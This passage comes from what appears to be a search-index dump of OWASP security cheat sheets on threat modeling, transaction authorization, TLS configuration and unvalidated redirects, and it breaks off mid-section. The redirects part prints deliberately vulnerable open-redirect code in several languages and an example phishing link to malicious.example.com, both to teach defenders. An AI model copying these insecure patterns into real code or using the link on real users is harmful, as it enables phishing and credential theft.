"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#rank-risks","title":"Rank Risks","text":"

Using a risk matrix, rank risks from most severe to least severe based on means, motive, and opportunity. Below is a sample risk matrix table; depending on your risk approach, you can define a different risk ranking matrix:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#determine-countermeasures-and-mitigation","title":"Determine countermeasures and mitigation","text":"

Identify risk owners and agree on risk mitigation with risk owners and stakeholders. Provide the needed controls in the form of code upgrades and configuration updates to reduce risks to acceptable levels.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-risk-owners","title":"Identify risk owners","text":"

For the assessors: after defining and analyzing the risks, the assessor should work on the mitigation plan by first identifying the risk owners, i.e. the personnel responsible for mitigating each risk (for example, someone from the information security team or the development team).

For the designers or the architects: they should assign the risk mitigation to the development team to consider it while building the application.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#agree-on-risk-mitigation-with-risk-owners-and-stakeholders","title":"Agree on risk mitigation with risk owners and stakeholders","text":"

After identifying the risk owners, it is important to review the mitigation controls for each of the identified risks. Some controls might be inapplicable; in that case, you should propose other mitigation controls or discuss possible compensating controls with the risk owners.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#build-your-risk-treatment-strategy","title":"Build your risk treatment strategy","text":"

For the assessor, this is considered the last step in the assessment process. The following steps should be conducted by the risk owner; however, the assessor should engage in 6.5 (Test risk treatment) to verify the remediation.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#select-appropriate-controls-to-mitigate-the-risk","title":"Select appropriate controls to mitigate the risk","text":"

Select one of the controls to reduce the risk, whether by upgrading the code, building a specific configuration during the deployment phase, and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#test-risk-treatment-to-verify-remediation","title":"Test risk treatment to verify remediation","text":"

Mitigation controls will not make the risk vanish completely; rather, they only reduce it. The user of this cheat sheet should therefore measure the value of the risk after applying the mitigation controls. The value of the risk should be reduced to meet the acceptance criteria set earlier.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#reduce-risk-in-risk-log-for-verified-treated-risk","title":"Reduce risk in risk log for verified treated risk","text":"

After applying the mitigation and measuring the new risk value, the user of this cheat sheet should update the risk log to verify that risk has been reduced.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#periodically-retest-risk","title":"Periodically retest risk","text":"

Application threat modeling is an ongoing process. In addition to changes to the application that may require re-evaluating the expected threats, it is also important to periodically retest the identified risks and the implemented risk treatments.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#appendix","title":"Appendix","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html","title":"Transaction Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#purpose-and-audience","title":"Purpose and audience","text":"

The purpose of this cheat sheet is to provide guidelines on how to securely implement transaction authorization so that it cannot be bypassed. These guidelines can be used by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Some applications use a second factor to check whether an authorized user is performing sensitive operations. A common example is wire transfer authorization, typically used in online or mobile banking applications.

For the purpose of this document we will call that process: transaction authorization.

Usage scenarios are not only limited to financial systems. For example: an email with a secret code or a link with some kind of token to unlock a user account is also a special case of transaction authorization. A user authorizes the operation of account unlocking by using a second factor (a unique code sent to his email address). Transaction authorization can be implemented using various methods, e.g.:

Some of these can be implemented on a physical device or in a mobile application.

Transaction authorization is implemented in order to protect against unauthorized wire transfers resulting from attacks using malware, phishing, password or session hijacking, CSRF, XSS, etc. Unfortunately, as with any piece of code, this protection can be improperly implemented and as a result it might be possible to bypass this safeguard.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#1-functional-guidelines","title":"1. Functional Guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#11-transaction-authorization-method-has-to-allow-a-user-to-identify-and-acknowledge-significant-transaction-data","title":"1.1 Transaction authorization method has to allow a user to identify and acknowledge significant transaction data","text":"

Users' computers cannot be trusted due to malware threats. Hence a method that does not let the user identify the transaction on an external device cannot be considered secure. Transaction data should be presented and acknowledged using an external authorization component.

Such transaction authorization components should be built using the What You See Is What You Sign principle. When a user authorizes a transaction they need to know what they are authorizing. Based on this principle, an authorization method must permit a user to identify and acknowledge the data that is significant to a given transaction. For example, in the case of a wire transfer: the target account and amount.

The decision about which transaction data can be considered as significant should be chosen based on:

For example when an SMS message is used to send significant transaction data, it is possible to send the target account, amount and type of transfer. However, for an unconnected CAP reader it is perceived to be inconvenient for a user to enter these data. In such cases, entering only the most significant transaction data (e.g. partial target account number and amount) can be considered sufficient.

In general, significant transaction data should always be presented as an inherent part of the transaction authorization process, and the user experience should be designed to encourage users to verify the transaction data.

If a transaction process requires a user to enter transaction data into an external device, the user should be prompted to provide a specific value (e.g. a target account number). Entering a value without a meaningful prompt could easily be abused by malware using social engineering techniques, as described in the example in paragraph 1.4. Also, for a more detailed discussion of input overloading problems, see here.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#12-change-of-authorization-token-should-be-authorized-using-the-current-authorization-token","title":"1.2 Change of authorization token should be authorized using the current authorization token","text":"

When a user is allowed to change the authorization token through the application interface, the operation should be authorized using their current authorization credentials (as is the case with a password change procedure). For example: when a user changes the phone number used for SMS codes, an authorization SMS code should be sent to the current phone number.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#13-change-of-authorization-method-should-be-authorized-using-the-current-authorization-method","title":"1.3 Change of authorization method should be authorized using the current authorization method","text":"

Some applications allow a user to choose between multiple methods of transaction authorization. In such cases, the user should authorize the change in authorization method using their current authorization method. Otherwise, malware may change the authorization method to the most vulnerable one.

Additionally, the application should inform the user about the potential dangers associated with the selected authorization method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#14-users-should-be-able-to-easily-distinguish-the-authentication-process-from-the-transaction-authorization-process","title":"1.4 Users should be able to easily distinguish the authentication process from the transaction authorization process","text":"

Malware can trick users into authorizing fraudulent operations when an application requires a user to perform the same actions for authentication as for transaction authorization. Consider the following example:

In the abovementioned scenario, the same method was used to authenticate the user and to authorize the transaction. Malware can abuse this behavior to extract transaction authorization credentials without the user's knowledge. Social engineering methods can be used regardless of the authentication and operation authorization methods in place, but the application shouldn't make such attack scenarios any easier.

Safeguards should allow the user to easily distinguish authentication from transaction authorization. This could be achieved by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#15-each-transaction-should-be-authorized-using-unique-authorization-credentials","title":"1.5 Each transaction should be authorized using unique authorization credentials","text":"

Some applications ask for transaction authorization credentials only once, e.g. a static password, a code sent through SMS, or a token response. Afterwards the user is able to authorize any transaction during the whole session, or at best has to reuse the same credentials each time a transaction needs to be authorized. Such behavior is not sufficient to prevent malware attacks, because malware can sniff such credentials and use them to authorize any transaction without the user's knowledge.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#2-non-functional-guidelines","title":"2. Non-functional guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#21-authorization-should-be-performed-and-enforced-server-side","title":"2.1 Authorization should be performed and enforced server-side","text":"

As with all other security controls, transaction authorization should be enforced server-side. It should by no means be possible to influence the authorization result by altering data that flows from the client to the server, e.g. by:

To achieve this, security programming best practices should be applied, such as:

To avoid tampering, additional safeguards should be considered, for example cryptographically protecting the data for confidentiality and integrity, and decrypting and verifying the data server-side.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#22-authorization-method-should-be-enforced-server-side","title":"2.2 Authorization method should be enforced server side","text":"

When multiple transaction authorization methods are available to the user, the server should enforce the use of the authorization method currently chosen by the user in the application settings or enforced by application policies. It should be impossible to change the authorization method by manipulating the parameters provided from the client. Otherwise, malware can downgrade the authorization method to a less secure or even the least secure one.

This is especially important when an application is extended to add a new, more secure authorization method. It is not uncommon for a new authorization method to be built on top of an old codebase. As a result, when a client sends parameters using the old method, the transaction may still be authorized, despite the fact that the user has already switched to the new method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#23-transaction-verification-data-should-be-generated-server-side","title":"2.3 Transaction verification data should be generated server-side","text":"

When significant transaction data are transmitted programmatically to an authorization component, extra care should be taken to prevent the client from modifying the transaction data at authorization time. Significant transaction data that has to be verified by the user should be generated and stored on the server, then passed to the authorization component without any possibility of tampering by the client.

A common anti-pattern is to collect significant transaction data client-side and pass it to the server. In such cases, malware can manipulate this data and, as a result, cause fake transaction data to be shown in the authorization component.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#24-application-should-prevent-authorization-credentials-brute-forcing","title":"2.4 Application should prevent authorization credentials brute-forcing","text":"

When transaction authorization credentials are sent to the server for verification, the application has to prevent brute-forcing. The transaction authorization process must be restarted after a number of failed authorization attempts. In addition, other anti-brute-forcing and anti-automation techniques should be considered to prevent an attacker from automating their attacks; see the OWASP Authentication Cheat Sheet.
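
A minimal sketch of restarting the authorization process after repeated failures (the attempt limit, the in-memory store and the field names are illustrative; a real implementation would persist this state server-side):

import hmac

MAX_ATTEMPTS = 3
pending = {}  # transaction_id -> {"otp": str, "attempts": int}

def verify_authorization(transaction_id, submitted_otp):
    tx = pending.get(transaction_id)
    if tx is None:
        return False  # no pending authorization - the user must start over
    if not hmac.compare_digest(tx["otp"], submitted_otp):
        tx["attempts"] += 1
        if tx["attempts"] >= MAX_ATTEMPTS:
            del pending[transaction_id]  # force the whole process to be restarted
        return False
    del pending[transaction_id]  # one-time use
    return True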

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#25-application-should-control-which-transaction-state-transitions-are-allowed","title":"2.5 Application should control which transaction state transitions are allowed","text":"

Transaction authorization is usually performed in multiple steps, e.g.:

  1. The user enters the transaction data.
  2. The user requests authorization.
  3. The application initializes an authorization mechanism.
  4. The user verifies/confirms the transaction data.
  5. The user responds with the authorization credentials.
  6. The application validates authorization and executes a transaction.

An application should process such a business logic flow in sequential step order, preventing a user from performing these steps out of order or even skipping any of them (see OWASP ASVS requirement 15.1).
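
A minimal sketch of enforcing the step order server-side (the state names and the transition table are illustrative and simply mirror the steps listed above):

ALLOWED_TRANSITIONS = {
    "ENTERED": {"AUTHORIZATION_REQUESTED"},
    "AUTHORIZATION_REQUESTED": {"CHALLENGE_SENT"},
    "CHALLENGE_SENT": {"CONFIRMED"},
    "CONFIRMED": {"AUTHORIZED"},
    "AUTHORIZED": {"EXECUTED"},
}

def advance(transaction, new_state):
    # Reject any attempt to skip a step or replay an earlier one
    if new_state not in ALLOWED_TRANSITIONS.get(transaction["state"], set()):
        raise ValueError(f"Illegal transition {transaction['state']} -> {new_state}")
    transaction["state"] = new_state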

This should protect against attack techniques such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#26-transaction-data-should-be-protected-against-modification","title":"2.6 Transaction data should be protected against modification","text":"

The transaction authorization process should protect against attack scenarios that modify transaction data after the initial entry by the user. For example, a bad implementation of a transaction authorization process may allow the following attacks (for reference, see steps of transaction authorization described in paragraph 2.5):

The protection against modification could be implemented using various techniques depending on the framework used, but one or more of the following should be present:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#27-confidentiality-of-the-transaction-data-should-be-protected-during-any-client-server-communications","title":"2.7 Confidentiality of the transaction data should be protected during any client / server communications","text":"

The transaction authorization process should protect the privacy of the transaction data being presented to the user for authorization, i.e. in section 2.5, steps 2 and 4.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#28-when-a-transaction-is-executed-the-system-should-check-whether-it-was-authorized","title":"2.8 When a transaction is executed, the system should check whether it was authorized","text":"

The result of the transaction entry and the authorization process described in paragraph 2.5 is the transaction execution. Just before the transaction is executed there should be a final control gate which verifies whether the transaction was properly authorized by the user. Such control, tied to execution, should prevent attacks such as:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#29-authorization-credentials-should-be-valid-only-by-limited-period-of-time","title":"2.9 Authorization credentials should be valid only by limited period of time","text":"

In some malware attack scenarios, the authorization credentials entered by the user are passed to a malware command and control (C&C) server and then used from an attacker-controlled machine. Such a process is often performed manually by an attacker. To make such attacks more difficult, the server should allow authorizing the transaction only within a limited time window between generation of the challenge or OTP and the transaction authorization. Additionally, such a safeguard will also help prevent resource exhaustion attacks. The time window should be carefully selected so as not to disrupt normal users' behavior.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#210-authorization-credentials-should-be-unique-for-every-operation","title":"2.10 Authorization credentials should be unique for every operation","text":"

To prevent all sorts of replay attacks, authorization credentials should be unique for every operation. It could be achieved using different methods depending on the applied transaction authorization mechanism. For example: using a timestamp, a sequence number or a random value in signed transaction data or as a part of a challenge.
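
A minimal sketch combining guidelines 2.9 and 2.10: the server signs the significant transaction data together with a random nonce and a timestamp, so the resulting credential is single-use and only valid within a limited time window (key handling, field layout and the window length are illustrative assumptions):

import hashlib, hmac, os, time

SERVER_KEY = os.urandom(32)      # kept server-side only
AUTH_WINDOW_SECONDS = 300        # max time between challenge and authorization
used_nonces = set()              # persist server-side in practice

def create_challenge(target_account, amount):
    nonce = os.urandom(16).hex()
    issued_at = int(time.time())
    payload = f"{target_account}|{amount}|{nonce}|{issued_at}".encode()
    mac = hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()
    return payload, mac

def verify_challenge(payload, mac):
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        return False
    _account, _amount, nonce, issued_at = payload.decode().split("|")
    if nonce in used_nonces:                                   # replayed credential
        return False
    if time.time() - int(issued_at) > AUTH_WINDOW_SECONDS:     # expired credential
        return False
    used_nonces.add(nonce)                                     # single use
    return True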

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#remarks","title":"Remarks","text":"

We have identified other issues that should be taken into consideration while implementing transaction authorization, but which we deem to be beyond the scope of this cheat sheet:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":"

References and future reading:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html","title":"Transport Layer Protection Cheat Sheet","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on how to implement transport layer protection for an application using Transport Layer Security (TLS). When correctly implemented, TLS can provide a number of security benefits:

TLS is used by many other protocols to provide encryption and integrity, and can be used in a number of different ways. This cheatsheet is primarily focused on how to use TLS to protect clients connecting to a web application over HTTPS; although much of the guidance is also applicable to other uses of TLS.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#ssl-vs-tls","title":"SSL vs TLS","text":"

Secure Sockets Layer (SSL) was the original protocol that was used to provide encryption for HTTP traffic, in the form of HTTPS. There were two publicly released versions of SSL - versions 2 and 3. Both of these have serious cryptographic weaknesses and should no longer be used.

For various reasons the next version of the protocol (effectively SSL 3.1) was named Transport Layer Security (TLS) version 1.0. Subsequently TLS versions 1.1, 1.2 and 1.3 have been released.

The terms \"SSL\", \"SSL/TLS\" and \"TLS\" are frequently used interchangeably, and in many cases \"SSL\" is used when referring to the more modern TLS protocol. This cheatsheet will use the term \"TLS\" except where referring to the legacy protocols.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#server-configuration","title":"Server Configuration","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-protocols","title":"Only Support Strong Protocols","text":"

The SSL protocols have a large number of weaknesses, and should not be used in any circumstances. General purpose web applications should default to TLS 1.3 (supporting TLS 1.2 if necessary) with all other protocols disabled. Where it is known that a web server must support legacy clients with unsupported and insecure browsers (such as Internet Explorer 10), it may be necessary to enable TLS 1.0 to provide support for them.

Where legacy protocols are required, the \"TLS_FALLBACK_SCSV\" extension should be enabled in order to prevent downgrade attacks against clients.

Note that PCI DSS forbids the use of legacy protocols such as TLS 1.0.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#only-support-strong-ciphers","title":"Only Support Strong Ciphers","text":"

There are a large number of different ciphers (or cipher suites) supported by TLS, which provide varying levels of security. Where possible, only GCM ciphers should be enabled. However, if it is necessary to support legacy clients, then other ciphers may be required.

At a minimum, the following types of ciphers should always be disabled:

See the TLS Cipher String Cheat Sheet for full details on securely configuring ciphers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-diffie-hellman-parameters","title":"Use Strong Diffie-Hellman Parameters","text":"

Where ciphers that use the ephemeral Diffie-Hellman key exchange are in use (signified by the "DHE" or "EDH" strings in the cipher name), sufficiently secure Diffie-Hellman parameters (at least 2048 bits) should be used.

The following command can be used to generate 2048 bit parameters:

openssl dhparam -out dhparam2048.pem 2048

The Weak DH website provides guidance on how various web servers can be configured to use these generated parameters.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#disable-compression","title":"Disable Compression","text":"

TLS compression should be disabled in order to protect against a vulnerability (nicknamed CRIME) which could potentially allow sensitive information such as session cookies to be recovered by an attacker.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#patch-cryptographic-libraries","title":"Patch Cryptographic Libraries","text":"

As well as the vulnerabilities in the SSL and TLS protocols, there have also been a large number of historic vulnerabilities in SSL and TLS libraries, with Heartbleed being the most well known. As such, it is important to ensure that these libraries are kept up to date with the latest security patches.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#test-the-server-configuration","title":"Test the Server Configuration","text":"

Once the server has been hardened, the configuration should be tested. The OWASP Testing Guide chapter on SSL/TLS Testing contains further information on testing.

There are a number of online tools that can be used to quickly validate the configuration of a server, including:

Additionally, there are a number of offline tools that can be used:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#certificates","title":"Certificates","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-keys-and-protect-them","title":"Use Strong Keys and Protect Them","text":"

The private key used to generate the cipher key must be sufficiently strong for the anticipated lifetime of the private key and corresponding certificate. The current best practice is to select a key size of at least 2048 bits. Additional information on key lifetimes and comparable key strengths can be found here and in NIST SP 800-57.

The private key should also be protected from unauthorized access using filesystem permissions and other technical and administrative controls.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-strong-cryptographic-hashing-algorithms","title":"Use Strong Cryptographic Hashing Algorithms","text":"

Certificates should use SHA-256 for the hashing algorithm, rather than the older MD5 and SHA-1 algorithms. These have a number of cryptographic weaknesses, and are not trusted by modern browsers.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-correct-domain-names","title":"Use Correct Domain Names","text":"

The domain name (or subject) of the certificate must match the fully qualified name of the server that presents the certificate. Historically this was stored in the commonName (CN) attribute of the certificate. However, modern versions of Chrome ignore the CN attribute, and require that the FQDN is in the subjectAlternativeName (SAN) attribute. For compatibility reasons, certificates should have the primary FQDN in the CN, and the full list of FQDNs in the SAN.

Additionally, when creating the certificate, the following should be taken into account:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#carefully-consider-the-use-of-wildcard-certificates","title":"Carefully Consider the use of Wildcard Certificates","text":"

Wildcard certificates can be convenient, however they violate the principle of least privilege, as a single certificate is valid for all subdomains of a domain (such as *.example.org). Where multiple systems are sharing a wildcard certificate, the likelihood that the private key for the certificate is compromised increases, as the key may be present on multiple systems. Additionally, the value of this key is significantly increased, making it a more attractive target for attackers.

The issues around the use of wildcard certificates are complicated, and there are various other discussions of them online.

When risk assessing the use of wildcard certificates, the following areas should be considered:

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-an-appropriate-certification-authority-for-the-applications-user-base","title":"Use an Appropriate Certification Authority for the Application's User Base","text":"

In order to be trusted by users, certificates must be signed by a trusted certificate authority (CA). For Internet facing applications, this should be one of the CAs which are well-known and automatically trusted by operating systems and browsers.

The LetsEncrypt CA provides free domain-validated SSL certificates, which are trusted by all major browsers. As such, consider whether there are any benefits to purchasing a certificate from a commercial CA instead.

For internal applications, an internal CA can be used. This means that the FQDN of the certificate will not be exposed (either to an external CA, or publicly in certificate transparency lists). However, the certificate will only be trusted by users who have imported and trusted the internal CA certificate that was used to sign them.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-caa-records-to-restrict-which-cas-can-issue-certificates","title":"Use CAA Records to Restrict Which CAs can Issue Certificates","text":"

Certification Authority Authorization (CAA) DNS records can be used to define which CAs are permitted to issue certificates for a domain. The record contains a list of CAs, and any CA not included in that list should refuse to issue a certificate for the domain. This can help to prevent an attacker from obtaining unauthorized certificates for a domain through a less-reputable CA. Where it is applied to all subdomains, it can also be useful from an administrative perspective by limiting which CAs administrators or developers are able to use, and by preventing them from obtaining unauthorized wildcard certificates.
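
For illustration, a zone could publish records such as the following (the permitted CA and the decision to forbid wildcard issuance are example choices, not recommendations):

example.org.  IN  CAA  0 issue "letsencrypt.org"
example.org.  IN  CAA  0 issuewild ";"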

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#always-provide-all-needed-certificates","title":"Always Provide All Needed Certificates","text":"

In order to validate the authenticity of a certificate, the user's browser must examine the certificate that was used to sign it and compare it to the list of CAs trusted by their system. In many cases the certificate is not directly signed by a root CA, but is instead signed by an intermediate CA, which is in turn signed by the root CA.

If the user does not know or trust this intermediate CA then the certificate validation will fail, even if the user trusts the ultimate root CA, as they cannot establish a chain of trust between the certificate and the root. In order to avoid this, any intermediate certificates should be provided alongside the main certificate.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-extended-validation-certificates","title":"Consider the use of Extended Validation Certificates","text":"

Extended validation (EV) certificates claim to provide a higher level of verification of the entity, as they perform checks that the requestor is a legitimate legal entity, rather than just verifying the ownership of the domain name like normal (or \"Domain Validated\") certificates. This can effectively be viewed as the difference between \"This site is really run by Example Company Inc.\" vs \"This domain is really example.org\".

Historically these displayed differently in the browser, often showing the company name or a green icon or background in the address bar. However, as of 2019 both Chrome and Firefox have announced that they will be removing these indicators, as they do not believe that EV certificates provide any additional protection.

There is no security downside to the use of EV certificates. However, as they are significantly more expensive than domain-validated certificates, an assessment should be made to determine whether they provide any additional value.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#application","title":"Application","text":""},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-tls-for-all-pages","title":"Use TLS For All Pages","text":"

TLS should be used for all pages, not just those that are considered sensitive such as the login page. If there are any pages that do not enforce the use of TLS, these could give an attacker an opportunity to sniff sensitive information such as session tokens, or to inject malicious JavaScript into the responses to carry out other attacks against the user.

For public facing applications, it may be appropriate to have the web server listening for unencrypted HTTP connections on port 80, and then immediately redirecting them with a permanent redirect (HTTP 301) in order to provide a better experience to users who manually type in the domain name. This should then be supported with the HTTP Strict Transport Security (HSTS) header to prevent them accessing the site over HTTP in the future.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#do-not-mix-tls-and-non-tls-content","title":"Do Not Mix TLS and Non-TLS Content","text":"

A page that is available over TLS should not include any resources (such as JavaScript or CSS) files which are loaded over unencrypted HTTP. These unencrypted resources could allow an attacker to sniff session cookies or inject malicious code into the page. Modern browsers will also block attempts to load active content over unencrypted HTTP into secure pages.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-the-secure-cookie-flag","title":"Use the \"Secure\" Cookie Flag","text":"

All cookies should be marked with the \"Secure\" attribute, which instructs the browser to only send them over encrypted HTTPS connections, in order to prevent them from being sniffed from an unencrypted HTTP connection. This is important even if the website does not listen on HTTP (port 80), as an attacker performing an active man in the middle attack could present a spoofed webserver on port 80 to the user in order to steal their cookie.
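
For example, a session cookie could be issued with a header such as the following (the cookie name is illustrative, and the additional HttpOnly and Path attributes are shown only for completeness; the Secure attribute is the subject of this section):

Set-Cookie: SESSIONID=<random-session-token>; Secure; HttpOnly; Path=/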

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#prevent-caching-of-sensitive-data","title":"Prevent Caching of Sensitive Data","text":"

Although TLS provides protection of data while it is in transit, it does not provide any protection for data once it has reached the requesting system. As such, this information may be stored in the cache of the user's browser, or by any intercepting proxies which are configured to perform TLS decryption.

Where sensitive data is returned in responses, HTTP headers should be used to instruct the browser and any proxy servers not to cache the information, in order to prevent it being stored or returned to other users. This can be achieved by setting the following HTTP headers in the response:

Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#use-http-strict-transport-security","title":"Use HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) instructs the user's browser to always request the site over HTTPS, and also prevents the user from bypassing certificate warnings. See the HTTP Strict Transport Security cheatsheet for further information on implementing HSTS.
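
A typical policy header looks like the following (the one-year max-age and the includeSubDomains directive are common choices rather than requirements; see the referenced cheat sheet for details):

Strict-Transport-Security: max-age=31536000; includeSubDomains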

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-the-use-of-client-side-certificates","title":"Consider the use of Client-Side Certificates","text":"

In a typical configuration, TLS is used with a certificate on the server so that the client is able to verify the identity of the server, and to provide an encrypted connection between them. However, there are two main weaknesses with this approach:

Client certificates address both of these issues by requiring that the client proves their identity to the server with their own certificate. This not only provides strong authentication of the identity of the client, but also prevents an intermediate party from performing TLS decryption, even if they have a trusted CA certificate on the client system.

Client certificates are rarely used on public systems due to a number of issues:

However, they should be considered for high-value applications or APIs, especially where there are a small number of technically sophisticated users, or where all users are part of the same organisation.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#consider-using-public-key-pinning","title":"Consider Using Public Key Pinning","text":"

Public key pinning can be used to provide assurance that the server's certificate is not only valid and trusted, but also that it matches the certificate expected for the server. This provides protection against an attacker who is able to obtain a valid certificate, either by exploiting a weakness in the validation process, compromising a trusted certificate authority, or having administrative access to the client.

Public key pinning was added to browsers in the HTTP Public Key Pinning (HPKP) standard. However, due to a number of issues, it has subsequently been deprecated and is no longer recommended or supported by modern browsers.

However, public key pinning can still provide security benefits for mobile applications, thick clients and server-to-server communication. This is discussed in further detail in the Pinning Cheat Sheet.

"},{"location":"cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html","title":"Unvalidated Redirects and Forwards Cheat Sheet","text":""},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application's access control check and then forward the attacker to privileged functions that they would normally not be able to access.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#safe-url-redirects","title":"Safe URL Redirects","text":"

If you want to redirect a user automatically to another page (without an action by the visitor, such as clicking on a hyperlink), you might implement code such as the following:

Java

response.sendRedirect(\"http://www.mysite.com\");\n

PHP

<?php
/* Redirect browser */
header("Location: http://www.mysite.com");
/* Exit to prevent the rest of the code from executing */
exit;
?>

ASP .NET

Response.Redirect(\"~/folder/Login.aspx\")\n

Rails

redirect_to login_path

Rust actix web

Ok(HttpResponse::Found()
    .insert_header((header::LOCATION, "https://mysite.com/"))
    .finish())

In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirects","title":"Dangerous URL Redirects","text":"

The following examples demonstrate unsafe redirect and forward code.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-1","title":"Dangerous URL Redirect Example 1","text":"

The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:

response.sendRedirect(request.getParameter("url"));

The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL. Additionally, the PHP code after this header() function will continue to execute, so if the user configures their browser to ignore the redirect, they may be able to access the rest of the page.

$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);

A similar example of vulnerable C# .NET code:

string url = request.QueryString["url"];
Response.Redirect(url);

And in Rails:

redirect_to params[:url]

Rust actix web

Ok(HttpResponse::Found()
    .insert_header((header::LOCATION, query_string.path.as_str()))
    .finish())

The above code is vulnerable to an attack if no validation or extra method controls are applied to verify that the URL is legitimate. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.

If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:

http://example.com/example.php?url=http://malicious.example.com

The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place.

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-url-redirect-example-2","title":"Dangerous URL Redirect Example 2","text":"

ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3.

The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.

ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):

